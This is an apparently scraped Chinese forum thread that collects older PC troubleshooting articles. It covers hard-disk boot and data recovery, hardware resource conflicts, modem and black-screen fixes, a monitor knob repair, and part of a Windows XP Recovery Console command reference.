        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第16楼

               附录
              每个用户的硬盘中都存放着大量的有用数据，而硬盘又是一个易出毛病的部件。为了有效的保存硬盘中的数据，除了有效的保存硬盘中的数据，备份工作以外，还要学会在硬盘出现故障时如何救活硬盘，或者提取其中的有用数据，把损失降到最小程度。

              1、系统不承认硬盘
              此类故障比较常见，即从硬盘无法启动，从A盘启动也无法进入C盘，使用CMOS中的自动监测功能也无法发现硬盘的存在。这种故障大都出现在连接电缆或IDE口端口上，硬盘本身的故障率很少，可通过重新插拔硬盘电缆或者改换IDE口及电缆等进行替换试验，可很快发现故障的所在。如果新接上的硬盘不承认，还有一个常见的原因就是硬盘上的主从条线，如果硬盘接在IDE的主盘位置，则硬盘必须跳为主盘状，跳线错误一般无法检测到硬盘。

              2、CMOS引起的故障
              CMOS的正确与否直接影响硬盘的正常使用，这里主要指其中的硬盘类型。好在现在的机器都支持"IDEautodetect"的功能，可自动检测硬盘的类型。当连接新的硬盘或者更换新的硬盘后都要通过此功能重新进行设置类型。当然，现在有的类型的主板可自动识别硬盘的类型。当硬盘类型错误时，有时干脆无法启动系统，有时能够启动，但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量，则硬盘后面的扇区将无法读写，如果是多分区状态则个别分区将丢失。还有一个重要的故障原因，由于目前的IDE都支持逻辑参数类型，硬盘可采用Normal、LBA、Large等。如果在一般的模式下安装了数据，而又在CMOS中改为其他的模式，则会发生硬盘的读写错误故障，因为其物理地质的映射关系已经改变，将无法读取原来的正确硬盘位置。

              3、主引导程序引起的启动故障
              硬盘的主引导扇区是硬盘中的最为敏感的一个部件，其中的主引导程序是它的一部分，此段程序主要用于检测硬盘分区的正确性，并确定活动分区，负责把引导权移交给活动分区的DOS或其他xx作系统。此段程序损坏将无法从硬盘引导，但从软区或光区之后可对硬盘进行读写。修复此故障的方法较为简单，使用高版本DOS的fdisk最为方便，当带参数/mbr运行时，将直接更换(重写)硬盘的主引导程序。实际上硬盘的主引导扇区正是此程序建立的，fdisk.exe之中包含有完整的硬盘主引导程序。虽然DOS版本不断更新，但硬盘的主引导程序一直没有变化，从DOS3.x到目前有winDOS95的DOS，所以只要找到一种DOS引导盘启动系统并运行此程序即可修复。

              4、分区表错误引导的启动故障
              分区表错误是硬盘的严重错误，不同错误的程度会造成不同的损失。如果是没有活动分区标志，则计算机无法启动。但从软驱或光驱引导系统后可对硬盘读写，可通过fdisk重置活动分区进行修复。如果是某一分区类型错误，可造成某一分区的丢失。分区表的第四个字节为分区类型值，正常的可引导的大于32mb的基本DOS分区值为06，而扩展的DOS分区值是05。如果把基本DOS分区类型改为05则无法启动系统，并且不能读写其中的数据。如果把06改为DOS不识别的类型如efh，则DOS认为改分区不是DOS分区，当然无法读写。很多人利用此类型值实现单个分区的加密技术，恢复原来的正确类型值即可使该分区恢复正常。分区表中还有其他数据用于纪录分区的起始或终止地址。这些数据的损坏将造成该分区的混乱或丢失，一般无法进行手工恢复，唯一的方法是用备份的分区表数据重新写回，或者从其他的相同类型的并且分区状况相同的硬盘上获取分区表数据，否则将导致其他的数据永久的丢失。在对主引导扇区进行xx作时，可采用nu等工具软件，xx作非常的方便，可直接对硬盘主引导扇区进行读写或编辑。当然也可采用debug进行xx作，但xx作繁琐并且具有一定的风险。

              5、分区有效标志错误引起的硬盘故障
              在硬盘主引导扇区中还存在一个重要的部分，那就是其最后的两个字节:55aah，此字为扇区的有效标志。当从硬盘，软盘或光区启动时，将检测这两个字节，如果存在则认为有硬盘存在，否则将不承认硬盘。此标志时从硬盘启动将转入rombasic或提示放入软盘。从软盘启动时无法转入硬盘。此处可用于整个硬盘的加密技术。可采用debug方法进行恢复处理。另外，DOS引导扇区仍有这样的标志存在，当DOS引导扇区无引导标志时，系统启动将显示为:"missingoperatingsystem"。其修复的方法可采用的主引导扇区修复方法，只是地址不同，更方便的方法是使用下面的DOS系统通用的修复方法。

              6、DOS引导系统引起的启动故障
              DOS引导系统主要由DOS引导扇区和DOS系统文件组成。系统文件主要包括io.sys、msdos.sys、command.com，其中command.com是DOS的外壳文件，可用其他的同类文件替换，但缺省状态下是DOS启动的必备文件。在Windows95携带的DOS系统中，msdos.sys是一个文本文件，是启动windows必须的文件。但只启动DOS时可不用此文件。但DOS引导出错时，可从软盘或光盘引导系统，之后使用sysc:传送系统即可修复故障，包括引导扇区及系统文件都可自动修复到正常状态。

              7、fat表引起的读写故障
              fat表纪录着硬盘数据的存储地址，每一个文件都有一组连接的fat链指定其存放的簇地址。fat表的损坏意味着文件内容的丢失。庆幸的是DOS系统本身提供了两个fat表，如果目前使用的fat表损坏，可用第二个进行覆盖修复。但由于不同规格的磁盘其fat表的长度及第二个fat表的地址也是不固定的，所以修复时必须正确查找其正确位置，由一些工具软件如nu等本身具有这样的修复功能，使用也非常的方便。采用debug也可实现这种xx作，即采用其m命令把第二个fat表移到第一个表处即可。如果第二个fat表也损坏了，则也无法把硬盘恢复到原来的状态，但文件的数据仍然存放在硬盘的数据区中，可采用chkdsk或scandisk命令进行修复，最终得到*.chk文件，这便是丢失fat链的扇区数据。如果是文本文件则可从中提取并可合并完整的文件，如果是二进制的数据文件，则很难恢复出完整的文件。

              8、目录表损坏引起的引导故障
              目录表纪录着硬盘中文件的文件名等数据，其中最重要的一项是该文件的起始簇号，目录表由于没有自动备份功能，所以如果目录损坏将丢失大量的文件。一种减少损失的方法也是采用上面的chkdsk或scandisk程序的方法，从硬盘中搜索出chk文件，由目录表损坏时是首簇号丢失，在fat为损坏的情况下所形成的chk文件一般都比较完整的文件数据，每一个chk文件即是一个完整的文件，把其改为原来的名字可恢复大多数文件。

              9、误删除分区时数据的恢复
              当用fdisk删除了硬盘分区之后，表面现象是硬盘中的数据已经完全消失，在未格式化时进入硬盘会显示无效驱动器。如果了解fdisk的工作原理，就会知道，fdisk只是重新改写了硬盘的主引导扇区(0面0道1扇区)中的内容。具体说就是删除了硬盘分区表信息，而硬盘中的任何分区的数据均没有改变，可仿造上述的分区表错误的修复方法，即想办法恢复分区表数据即可恢复原来的分区即数据，但这只限于除分区或重建分区之后。如果已经对分区用format格式化，在先恢复分区后，在按下面的方法恢复分区数据。

              10、误格式化硬盘数据的恢复
              在DOS高版本状态下，格式化xx作format在缺省状态下都建立了用于恢复格式化的磁盘信息，实际上是把磁盘的DOS引导扇区，fat分区表及目录表的所有内容复制到了磁盘的最后几个扇区中(因为后面的扇区很少使用)，而数据区中的内容根本没有改变。这样通过运行"unformatc:"即可恢复原来的文件分配表及目录表，从而完成硬盘信息的恢复。另外DOS还提供了一个miror命令用于纪录当前的磁盘的信息，供格式化或删除之后的恢复使用，此方法也比较有效。


电脑维修中的“八先八后”

《一键清理系统垃圾》

电脑维修中的“八先八后”

      相对于其它电器产品来说，电脑是一个容易出这样那样故障的东东。电脑出故障了，是许多电脑爱好者头痛的事情，该如何来应对及解决我们所遇到的电脑故障呢？在此我总结撰写了一篇电脑维修中的“八先八后”维修法则，抛砖引玉，以飨读者—－
一、先调查，后熟悉
无论是对自己的电脑还是别人的电脑进行维修，首先要弄清故障发生时电脑的使用状况及以前的维修状况，才能对症下药。此外，在对其电脑进行维修前还应了解清楚其电脑的软硬件配置及已使用年限等等，做到有的放矢。
实例解析 ―― 如一操作系统为PWIN98第一版的电脑在使用中频繁出现系统死机与“非法操作”提示增多现象，十分恼人，该用户准备重新格式化磁盘重装操作系统。笔者觉得不用这么麻烦，笔者仔细看了其电脑的配置与软硬件安装情况并用杀毒软件查毒后……经笔者询问，该用户称最近安装了新版的IE6浏览器，会不会是IE6浏览器与其系统兼容性不好呢？笔者尝试在“添加／删除程序”栏里卸载掉新版的IE6浏览器，重新启动电脑后，故障现象不再频繁发生。所以对于这类故障不忍将新安装的软件或硬件或驱动／DirectX等卸掉如不能解决问题再做动大手笔的维护工作。
二、先机外，后机内
对于出现主机或显示器不亮等故障的电脑，应先检查机箱及显示的外部件，特别是机外的一些开关、旋钮是否调整外部的引线、插座有无断路、短路现象等，不要认为这些是不关紧要的小处，实践证明许多用户的电脑故障都是由此而起的。当确认机外部件正常时，再打开机箱或显示进行检查。
实例解析 ―― 一电脑在搬动位置后出现主机不亮（主机风扇也不转）的故障，该用户认为是主机电源年久失修被损毁，打开机箱准备拆下电源更换。笔者观察其主机和显示器分别用一根电源线从电源插座连接，而显示器显示正常。本着先简单后容易的原则先将主机的电源插头换一个电源插孔试之，无效，便将正常使用的显示器电源线取下连接主机，主机恢复正常。将问题线接上显示器，也不亮，证明问题就来自这看似不起眼的电源线（内部断路）。
三、先机械，后电气
对于光驱及打印机等外设而言，先检查其有无机械故障再检查其有无电气故障是检修电脑的一般原则。例如CD光驱不读盘，应当先分清是机械原因引起的（如或光头的问题），还是由电气毛病造成的。只有当确定各部位转动机构及光头无故障时，再进行电气方面的检查。
实例解析 ―― 一购一年多40速光驱，故障现象为读不出盘。笔者接手后，拆开光驱先观察了一下光驱的内部结构状况，此款光驱为全钢结构，一般应不会存在较严重的机械情况，笔者也没有急于在它的光头和加大激光头功率上进一步“摧残”它。放进一张碟片，笔者仔细的观察了一下碟片的旋转及光头给件的动作,下进等电机的进退情况，发现碟片的旋转基本正常，电机的进退也没太大问题，反而光头组件在空载或加碟片的情况下，在滑动杆上滑动十分吃力，关掉电源，用手轻轻推了几下光头组件使其在杆上滑动，有很明显的迟滞感。这时笔者再重点观察这款光驱的滑动杆，见其上边原本应白色的润滑油已变成了浅黑色，拿到光线较强的地方甚至可见密密的灰尘杂质，难怪滑动不灵活了。先用纯酒精将滑动组件上的已含杂质的润滑油清理干净，然后再重新加上新的润滑油，然后重新试机，读盘恢复正常。
四、先软件，后硬件
先排除软件故障再排除硬件问题，这是电脑维修中的重要原则。例如WINDOWS系统软件的被损坏或丢失可能造成死机故障的产生，因为系统启动是一个一步一个脚印的过程，哪一个环节都不能出现错误，如果存在损坏的执行文件或驱动程序，系统就会僵死在这里。但电脑各部件的本身问题，插接件的接口接触不良问题，硬件设备的设置问题例如BIOS，驱动程序的是否完善，与系统的兼容性，硬件供电设备的稳定性，以及各部件间的兼容性抗外界干扰性等等也有可能引发电脑硬件死机故障的产生。我们在维修时应先从软的方面着手再考虑硬的。
实例解析 ―― 一台电脑启动自检后，在屏幕上显示“No ROMBasic,System Halted”信息后死机，硬盘灯也长亮不熄。排除了硬盘坏道的原因，很明显造成这一故障的原因是硬盘的引导程序被破坏，造成系统找不到硬盘而死机。修复这种故障的办法很多。如大家可采用KV300，它能很轻松的解决硬盘引导区被破坏的故障，其使用方法很简单大家可参考下KV300的说明文件笔者在此就不多话了，而如果你没有它那么也可用软盘启动电脑后在纯DOS状态下，执行特别的“FDISK／MBR”命令，它也可强行将正确的主引导程序及结束标识覆盖在硬盘的主引导区上，但大家要注意的是这个命令有一定的危险性。
五、先清洁，后检修
在检查机箱内部配件时，应先着重看看机内是否清洁，如果发现机内各元件、引线、走线及金手指之间有尘土、污物、蛛网或多余焊锡、焊油等，应先加以清除，再进行检修，这样既可减少自然故障，又可取得事半功倍的效果。实践表明，许多故障都是由于脏污引起的，一经清洁故障往往会自动消失。
实例解析 ―― 一电脑在一次打开机箱安装一新显卡后，出现重新开机后显示器黑屏，机内喇叭发出连续的长声“嘀嘀”蜂鸣报警声。故障分析：机箱内喇叭发出连续的鸣叫，这是典型的内存报错故障。虽然说大家在拆机或搬动电脑时有可能并没有去动内存条，但是内存是个精密东东，它的大敌就是灰尘，而你的电脑在使用一段时间之后机箱内就很可能铺上薄薄一层余灰，而和CPU靠得较近的内存更是最大的“受害者”，CPU风扇吹来的灰尘，很可能给你的内存上铺上厚厚一层，稍有震动灰尘就有可能掉入内存插槽里，引起局部短路或接触不良，造成起动电脑时显示器黑屏和机箱内喇叭报错。对于这种情况，你肯定应该先检查内存的安装情况，可用手先按几下内存再开机，看其接触是否变好，如还不行；那么你可以将内存取下，先将内存表面的灰尘打扫干净，然后再用小号细毛刷仔仔细细将内存插槽内清扫干净，然后重新插好内存故障一般就可排除。
六、先电源，后机器
电源是机器及配件的心脏，如果电源不正常，就不可能保证其它部分的正常工作，也就无从检查别的故障。根据经验，电源部分的故障率在机中占的比例最高，许多故障往往就是由电源引起的，所以先检修电源常能收到事半功倍的效果。
实例解析 ―― 一台15寸显示器出现无光栅无图像且能听见电源发出明显“吱吱”声的显示故障。故障分析：从故障现象分析来看电源电路，行扫描电路，主要负载电路有故障是造成这类问题的原因。由于电源发出“吱吱”声表明开关电源已工作，因此表明开关变压器以前的电路基本无问题。首先用万用表检查五个输出端电压是否正常，结果发现电源滤波电容器C117的正极端为0V，而正常应为名5V左右，显然不正常，这表明其周边电路元器件存在短路或开路现象。使用测量电流的方法发现L105电流很小，进一步怀疑其前面的整流二极管VD106有问题，用替换法将其更换后故障排除。
七、先通病，后特殊
根据电脑故障的共同特点，先排除带有普遍性和规律性的常见故障，然后再去检查特殊的故障，以便逐步缩小故障范围，由面到点，缩短修理时间。
实例解析 －－ 一电脑在更换主板重新启动电脑后出现电源灯亮但系统不自检显示器黑屏的故障。打开机箱，仔细观察，发现CPU风扇正常运转，关掉电源后仔细检查板卡的安装，重点重新安装内存条及显卡，检查主板的相关跳线等情况，确认无误，遂采用“最小系统法”排除故障，去掉硬盘光驱等的连接线，只保持主板，CPU，内存，显卡的最小系统，开机后系统顺利开启。便重点检查光驱和硬盘的连接情况，当上好光驱后上述故障重新出现，难道是光驱没上好，该光驱单独接在IDE2总线接口上，笔者检查发现，该光驱连接用的IDE线接头上无防反插的凸块，难道是接反了？仔细一看果不其然，正确上好后系统正常起。
八、先外围，后内部
在检查电脑或配件的重要元器件时，不要先急于更换或对其内部或重要配件动手，而应检查其外围电路，在确认外围电路正常时，再考虑更换配件或重要元器件。若不问青红皂白，一味更换配件或重要元器件了事，只能造成不必要的损失。从维修实践可知，配件或重要元器件外围电路或机械的故障远高于其内部电路。
实例解析 ―― 一单位里的PC,硬盘在正常使用中，只是重新启动了一下电脑后，硬盘便找不到了，据该电脑的操作员称，这硬盘前两天也曾出现这这样的毛病，但过了一会儿自己又找得到了，今日上班时，在正常的使用的情况下只是重新启动了电脑，系统便再也找不到硬盘了。打开机箱一看该硬盘为三年前购的西数3．2G 硬盘，由于被经常拆卸来拷贝数据显得很旧。对于这类故障可首先检查IDE硬盘线，换新后无效，试着换个电源插头重新插紧，开机后硬盘“忽忽”的动转起来恢复正常，搞掂！装好配件合上机箱盖板，再重启，奇怪的是硬盘又不见了踪影……如此反复几次，硬盘无法正常使用，但笔者只要将硬盘电源线插拔几次，便又能恢复正常。会不会是硬盘电源接口内的接线柱有接触不良，取下观察，并无生锈或起卤现象。用万用表来检测接线柱与硬盘电路板上的接线柱焊点间的导通情况，笔者发现有一根柱（5V）要用表笔抵紧才能导通，排除了接线柱表面氧化或焊点虚焊等情况，笔者花3元购来一电源线转接线，剪去接头剥出铜线，将其一一按顺序在硬盘电源部分电源插口接线柱在电路板上的对应焊点上一一焊好，将电源转接线的公头插上主机电源线的一个母头，重新开机，PC又恢复了往日的正常。


电脑硬件资源的冲突与解决方法

《一键清理系统垃圾》

电脑硬件资源的冲突与解决方法

    硬件资源冲突的典型表现：当你添加新硬件时或添加新硬件后系统经常无缘无故地死机、黑屏；启动时，无故进入安全模式；声卡和鼠标不能正常工作或彻底罢工；按住“Alt”键，用鼠标双击我的电脑图标查看系统属性时，有惊叹号出现；打印机和软驱工作不正常。当然，也不能排除计算机病毒作怪，因为有些病毒发作时也会出现类似的现象，所以不能一概而论。
        硬件冲突的主要原因：添加新硬件时，你新添加的硬件占用了原有设备的IRQ中断、DMA通道、I/O地址等计算机资源，在新旧硬件之间发生了资源冲突。这将导致一或多个硬件设备无法正常工作，或系统工作不稳定的后果。
        资源冲突的检查方法：先按住“Alt”键，在用鼠标双击“我的电脑/系统属性”，查看硬件设备的工作状态。一般来说，如果系统有问题，通常会出现以下三种提示符即：1.在格式化硬盘并重装系统后，出现黄色的“？”。它的含义为：硬件驱动程序错误或资源冲突。2.在为你的系统添加新硬件时，出现带有圆圈的蓝色“！”号。它的含义为：该设备基本能够使用，但系统认为它有问题，仍可正常工作。3.在为计算机系统添加新硬件时，导致严重冲突，而出现红色“×”号。它的含义为：这个设备不能工作或该设备不存在，它会使系统经常以“安全模式”启动或经常在启动时提醒你搜索新硬件。
        据我个人了解，引起计算机硬件资源冲突的硬件，主要在PCI1插槽之间或PCI插槽与鼠标接口及COM1、COM2之间，还有ISA插槽与打印机LPT1并口之间。显卡与主板的冲突比较好判断，一般系统经常以“安全模式”启动或经常在启动时提醒你搜索新硬件；经常提醒你搜索显卡的最新驱动程序。例如：I740显卡与使用VIA693芯片主板之间的冲突。也有AGP显卡与PCI声卡之间的冲突，但此类冲突并不多见。
        硬件资源冲突并不是很难解决，但首选的解决方法是能够更换引起冲突的硬件。如果条件不允许就只好用以下方法来解决了。
        一、更改硬件资源设置
        第一步：单击“开始/设置/控制面板”，双击“系统/设备管理器”选项卡。单击有问题的设备后，点击“属性”按钮。进入该设备的属性设置窗口，然后选择“资源”选项卡；用笔将“资源”选项卡中有问题的IRQ中断、I/O地址及DMA通道记录在纸上作为备用。
        第二步：修改硬件资源配置。在设备的属性设置窗口的“资源”选项卡中，选择手动配置。在配置之前，我们应先了解一些硬件知识与硬件资源的占用情况。一般来说资源占用大户应首推声卡，它至少占用一个IRQ中断、两个DMA通道与多个I/O地址；其次为SCSI卡，它占用一部分I/O地址与一个IRQ中断及一个DMA通道；还有MODEM卡与网卡都是较大的系统资源占用者。在修改硬件资源配置时，我们应首先找到有问题的设备。一般在系统属性的设备管理器窗口，会发现上面所讲的三种提示符。并针对每一种提示符选择相应的解决方法。
        第一种：黄色的“？”。针对这种提示符，首先应上网下载该设备的最新驱动程序。下载之后，先在“系统属性/设备管理器”窗口删除该设备，并在“系统属性/设备管理器”窗口点击“刷新”按钮。按提示重新安装驱动程序。然后，在“系统属性/设备管理器”窗口看看那个黄色的“？”是否还存在。不过严格地说，这种冲突不属于真正意义上的冲突，它的主要原因是系统没有正确识别该硬件，或驱动程序不正确。不过也有例外，即驱动程序与系统软件冲突，一般升级驱动程序都可以解决该问题。
        第二种：带有圆圈的蓝色“！”号。这种提示符表示该硬件能够工作并且驱动程序安装正确，但该设备的一部分与系统其它硬件有冲突。一般来说，可以通过更换该硬件的插槽来解决这种冲突。我曾经遇到PCI 64/128声卡与Acer3D鼠标冲突的实例。我用了两种办法来解决该冲突。第一种方法是在“系统属性/设备管理器”窗口，选择有问题的设备并单击“属性”按钮，然后选择“资源”选项卡。先去掉“使用自动的设置”一项前面的钩，然后选定有问题的设备并单击“更改设置”按钮。在弹出的设备属性窗口中，选择一个没有冲突的“值”，并单击确定按钮，待重新启动之后，问题解决。第二种方法：在BIOS中，更改这个设备的中断，同样可以解决该问题。
        第三种：红色“×”号。代表该硬件损坏或该硬件与系统存在着严重的冲突。现在
        已不能正常使用。同样更换该硬件的插槽也可以解决该问题。有这样一个例子：我曾用过微星6199VA主板，当时PCI1插槽插的是一块创新PCI64声卡，在添加一块“金网霸”MODEM卡时与声卡发生冲突。在反复更换插槽后解决了冲突。有些非即插即用的设备可以通过设置该板卡上的跳线来解决冲突。例如一些老的SCSI硬盘接口卡，就可以通过设置该SCSI卡上的跳线来解决冲突问题。同样也可以在“系统属性/设备管理器”窗口修改该设备的IRQ中断、DMA通道、I/O地址的值来解决该问题。
        二、更换插槽
        更换插槽是一种简单而有效的方法，众所周知，VIA主板的兼容性不怎么好，所以使用VIA芯片主板的朋友，在选购硬件时，应注意兼容性的问题。如果你的主板上有五个PCI插槽，当你使用两个以上的PCI设备时，应尽量不使用PCI1插槽，以避免发生冲突。在你添加新设备时，还应详细阅读该设备的说明书。
        三、设置BIOS
        当以上两种方法都无法解决你的冲突问题时，可以试着在BIOS中屏蔽某些不用的设备端口，例如“串口（COM1、COM2）、并口（LPT1）及红外线接口等。必要的时候也可以屏蔽掉USB端口。同时也可以将BIOS中PNP OS Installed设置为Yes，它可让操作系统重新设置中断。
作者：王庆恩
来源：电脑报


调制解调器使用问题

《一键清理系统垃圾》

调制解调器使用问题

    现在调制解调器仍然是网络接入的主要设备，它的工作状态是否良好直接影响到接入速度以及我们的钱包，因此我把使用过程中遇到的问题和解决的办法写出来给大家参考。

    1。拿起电话来没任何声音

    解决方法：检查连线、Modem状态。把连线拔下重新插一次。开/关Modem，使Modem状态就绪。用Win 9x中的Modem诊断或在别的电脑上检测该Modem。如果是软猫一般就是连线和接触的问题了，可能是连接调制解调器及电话的连线断了或没接好，调制解调器的状态可能不正常,调制解调器坏了也是可能的。平时不上网时和打雷时应该断开电话线。

    2。在使用过程中，WINDOWS有时拨号无声，有时，用拨号软件拨号时也没有电话的拨号声音。

    解决方法：复位外置Modem，关掉并打开其电源。复位内置Modem可以使用重新启动系统。有时拨号没有声音时，可以用另外一个软件拨号程序试拨，如有声音可以再回来拨号。有时，调制解调器的工作状态可能不对。外置的调制解调器的许多指示灯都亮着，这显然不对。可以关掉其电源开关再打开。对于软MODEN 可以检查资源是否有冲突，重新插拔MODEM卡，看看是不是接触不好。有次我上午还好好的，下午就拨号无声，经过我几次重起，居然在设备管理器中找不到调制解调器了，重新插拔后问题解决。

    3。连接速率低，而且还经常断线。

    问题原因及解决方法：很大原因由于线路质量不好，如果电话线路质量不好，经常断线，会严重影响浏览速度。电话线上干扰比较大，例如使用分机、与电话并联、使用子母机，带防盗器的电话、都会影响Modem的连接效果。 有时是计算机端口的性能不稳定，这时可以适当地降低串口的速率。有时用软件的方法也可以解决（各网站报刊以前也说过）其解决办法是：单击“开始→设置→控制面板→调制解调器”，从Modem中选择“属性/连接页面/高级选项”，在附加设置中填入“S10=50”和“S25=200”，其中前者可以强制Modem在载波暂时丢失时保持5秒钟的连接状态，而后者则可以强制Modem在DTR（Data Terminal Ready，数据终端就绪）信号瞬时无效时保持2秒的连接状态，从而可以避免线路传输质量不良时 Modem发生断线故障。我换了根电话线，把电话线直接接在MODEN上，加上了“S10=50”和“S25=200”的参数，问题解决。


对付“黑脸”八部曲

《一键清理系统垃圾》

对付“黑脸”八部曲

    显示器“黑脸”，是众多电脑操作人员最为棘手的问题。因为“脸”一“黑”，什么提示也不给，只有凭经验在“黑暗”中摸索了。下面是笔者在黑暗中摸索出来的八部曲，对付“黑脸”时屡战屡胜，希望对诸位有所裨益。

    一查主机电源是否工作，是否有“呼呼”的电源风扇声？主机面板上的电源指示灯、硬盘指示灯是否亮？

    ──巧妇难为无米之炊，主机电源不工作或主板没有加电，显示器缺乏数据信号来源，“黑脸”理所当然。

    二查显示器是否加电，显示器的电源开关是否打开？电源指示灯是否亮？用手靠近显示器屏幕并慢慢移动是否有高压静电感应？

    ──并非陈词老调，不开启显示器电源开关，或显示器存在硬件故障，根本没有加电，切莫瞎忙乎！

    三查与显示卡连接的信号线接触是否良好？拔下插口仔细检查，D型插口中是否有弯针或断针？

    ──初学者和粗心大意者经常遭遇的问题，在连接D型插口时，用力不匀，或忘记拧紧D型插口的固定螺丝，使插口接触不良；或因插接插口时使用方法不当、用力过猛，使D型插口内断针或弯针。

    四查显示卡安装是否正确？与主板插口间的接触是否良好？是否因使用日久积尘太多而导致接触不良？显示卡上的芯片是否有烧焦、炸裂痕迹，显存是否老化？

    ──因显示卡而导致的“黑脸”，计算机一般还有一短四声的“嘀嘀”声提示。安装显示卡时，要用手握住显示卡上半部分，均匀用力插入插槽，使卡的固定螺丝口与主机箱的螺丝口相吻合，切忌强行固定，导致显示卡扭曲。如确认安装没问题，则取下显示卡用酒精棉花清洁插脚或调换插槽，重新插试。再不行，换一块好的显示卡再试吧！

    五查其他板卡与主板各插口的接触，包括声卡（PCI或ISA）、其他功能卡（解压卡、视频捕捉卡等）与主板插槽的接触是否良好？注意检查硬盘的数据线与硬盘的电源线接法是否正确？更换各插槽中的功能卡、调换插槽、用酒精清洁插脚等方法一一测试。

    ──众多DIYER容易忽视的问题，往往认为“黑脸”是显示部分的事，而与声卡、解压卡或其他设备无关。事实上，因声卡等设备的安装不正确，导致系统初始化工作难以完成，特别是硬盘的数据线与硬盘电源线插错（一般来说硬盘的电源线与数据线是红线对中，但并非千篇一律，有些原装机如Compaq机，其电源线与数据线的红线是同向的），“黑脸”就没商量了。

    六查内存条与主板的接触是否良好，内存条的质量是否过硬？拔下内存条重新插试，或更换新的内存条。

    ──若出现内存条方面的问题，在启动计算机时，通常还有连续四声的“嘀嘀”声。选购内存条时请认准品牌和激光防伪标志，购买正宗的内存条，便宜大多没好货呦！

    七查CPU与主板的接触是否良好。

    ——因运输或搬运中受到振动，使CPU与主板的Slot1插口或Socket7插座接触不良。用手按一按CPU，或取下CPU重新插试。

    八 查主板的总线频率、系统频率、DIMM频 率

     等跳线是否正确。

    ——对照主板说明书，逐一检查各个跳线，顺序为“系统频率跳线→CPU主频跳线→DIMM频率跳线”，除了CPU的电压跳线必须小心外，其余跳线可大胆设定，说不定会“歪打正着”。笔者曾购买PC－100内存条（绝对真实！），在大众VA－503＋主板中按PC－100设定DIMM频率时，无论如何，就是“黑脸”，改按Non PC－100设置，倒“灵”了。

    除了按上述八部曲进行检查外，还可根据计算机的工作状况来快速定位，如在开启主机电源后，可听见计算机自检完成、硬盘指示灯不停闪烁（操作系统运行），则应在第二至四步检查。

    最后还要提醒您注意的是，有个别显示卡与主板的兼容性较差（如S3765显卡与小皇板），也会给您个“黑脸”。

    上述检查步骤均基于显示器本身无“病”，即显示器的电源指示灯在开启主机电源后由绿变黄，但显示屏“黑脸”。如仍无法使“黑脸”开颜，该把“黑脸”送进“医院”彻底“治治”了！


令我倒霉的是打开ie 就出现了一大窜的网页，真烦 在注册表把所有的连接都

《一键清理系统垃圾》

令我倒霉的是打开ie 就出现了一大窜的网页，真烦 在注册表把所有的连接都

删除了，重器后还是不行
怎么办呀》？

嗯,如楼上所说差不多~
检查:
开始-启动组
检查MSCONFIG里的启动,WIN.INI里的WINDOWS这项,检查AUTOEXEC.BAT
检查REGEDIT里的所有RUNXX项~
最后检查IE的开始页,选择一个速度较快,干净的网址,然后锁定
最后去下载IE的补丁~

查不多我来　总结一下．．开始-运行　msconfig　启动里面不要的全去掉．．具体msconfig各项　论坛里有介绍　　在看看添加删除程序里面有没有黄色网站的小程序　卸载掉（有的要卸载两遍）
用３７２１的上网助手　清一下　　或者用魔法兔子　ＩＥ清楚器什么的都行～～～～
从启ＯＫ！

点ie图标属性,看是否后面加了一个网址,如果桌面上的ie 是快捷方式的话就要小心了.


飞利浦105A彩显──OSD控制旋钮故障的检修

《一键清理系统垃圾》

飞利浦105A彩显──OSD控制旋钮故障的检修

一台飞利浦105A彩色显示器，使用四年有余。近段时间出现了调节OSD旋钮不灵敏的故障，表现为激活OSD主菜单后，选择第二层菜单时便不受控制了，须小心翼翼地慢调，才能选中，进入第三层菜单后，显示0∽100%的参数。在正常情况下，顺时针旋转OSD旋钮，参数向0%靠近，逆时针旋转OSD旋钮，参数向100%靠近。现在发现，两个方向调节OSD钮，都向0%靠近。有时最高达到40%，但不稳定，稍动OSD钮，便又回到0%，造成图像行场幅度无法调节，倾斜、枕形失真等也无法校正，很不方便，遂决定打开机壳检修。
    105A彩显外形设计细腻考究，线条精美流畅，但这也给初次拆卸增加了困难。仔细查看仅在底板上有两颗螺丝，拆掉后，将后盖下部往外拉动约5mm，其上部刚松动，强行取后盖无效，分析后盖上部应有锁扣，用起子插入缝上的二处搭接板轻按。“咔”的一声，锁扣脱开，这时便可顺利地取下后盖。
    后盖取下后观察，发现要想取出OSD旋钮，必须去掉主电路板，卸下底板才行。先将视放电路板从显像管座处与显像管脱开。此处应注意固定在显像管管枪圆周上有两个塑料线扎，穿过视放板后，各用两个塑料套锁住，用钟表起子撬开棘爪，可慢慢退出塑套，然后轻轻晃动视放板，使其与显像管脱开。再从显像管侧壁上脱开阳极高压线，最后从主板上拔下相关的插头，并做好记录，从底板上抽出主电路板（包括视放板）。去掉三颗螺丝钉，底板便与面板分离开了，这时可见到OSD旋钮焊在一块电路板上。
    此旋钮编号为1885，原以为是一只电位器，故障可能是由于某一引脚与碳膜脱开而引起。经单独测试，感觉它不像电位器。将其焊下，拆开外壳，结构如附图1（^17030803a^），中间部位通过C接地，顺时针旋转，A通过簧片先接C到地，逆时针旋转，B通过簧片先接C到地。这实际上相当于两个按键，不停地向上或向下按动按键，从而对参数进行调节，有关电路如附图2（^17030803b^）所示。经检查，内部簧片上有污点，用酒精棉球擦干净后，装上焊好，反复检查各插头复原无误，通电工作，实际调节OSD旋钮灵敏可靠，手感很好。至此由于有污物，使簧片接触不良而造成的故障得以修复。


Windows XP 控制台命令详解 - 辅助操作和特殊功能命令

《一键清理系统垃圾》

Windows XP 控制台命令详解 - 辅助操作和特殊功能命令

2002-02-22　　　　作者：

编者语：
    Windows XP（包括 Windows 2000）的控制台命令是在系统出现一些意外情况下的一种非常有效的诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总结，这次辛苦老范给我们整理了这份实用的秘笈。

    Cls

    清除屏幕。

    清除后的屏幕只显示命令提示符和插入点。

    Disable

    禁用 Windows XP 、Windows 2000 或 Windows NT 4.0 系统服务或设备驱动程序。disable 命令仅在使用故障恢复控制台时才可用。

    disable {service_name] |[ device_driver_name}

    参数

    service_name

    要禁用的系统服务名称。

    device_driver_name

    要禁用的设备驱动程序名称。

    范例

    下例将禁用 Eventlog 服务：

    disable eventlog

    注意

disable 命令将指定的服务或驱动程序的启动类型设为 SERVICE_DISABLED 。
使用 disable 命令禁用系统服务或设备驱动程序时，该系统服务或设备驱动程序上次启动类型的名称将显示在屏幕上。应该记下该名称，以便在需要时使用 enable 命令将启动类型恢复为上次的设置 。
